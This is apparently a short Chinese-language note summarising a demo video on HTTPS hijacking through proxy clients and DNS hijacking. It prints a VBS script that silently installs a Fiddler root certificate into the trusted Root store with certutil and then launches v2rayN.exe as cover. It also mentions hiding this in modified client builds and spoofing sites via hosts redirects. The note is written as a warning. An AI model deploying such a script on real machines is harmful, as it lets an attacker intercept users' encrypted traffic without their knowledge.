演示视频:?v=vuF6rDLp3pg
HTTPS劫持
当服务端使用Fillder劫持https请求的时候,客户端就需要有Fillder的证书,才能访问成功,否则会出现,“内容不安全”等提示。视频里演示了,一个脚本 test.vbs:
set ws=WScript.CreateObject("WScript.Shell")ws.Run "certutil.exe -addstore -f Root D:\v2\FiddlerRoot.cer", 0# 装证书ws.Run "D:\v2\v2rayN.exe" # 为什么 需要这一步?不太理解在演示中,打开v2rayN.exe 证书就被安装了。所以,被劫持了,访问 https网站,也没有任何 不安全的提示。视频里 说 高级的伪装,直接 写进 v2rayN.exe里面(开源)。
注意:如果安装了 代理服务器节点的根证书 并添加到了 受信任的颁发机构,HTTPS 就等同于 HTTP了。
DNS劫持
DNS劫持的话,是在 服务器上 修改 hosts文件,指向自己或另一台服务器 ← 在这台服务器上 搭建 一个网页服务器,视频里的演示 是 php代码 header()指向了另一个网页,实际上 完全可以 仿一个网站 欺骗 客户端。
安全建议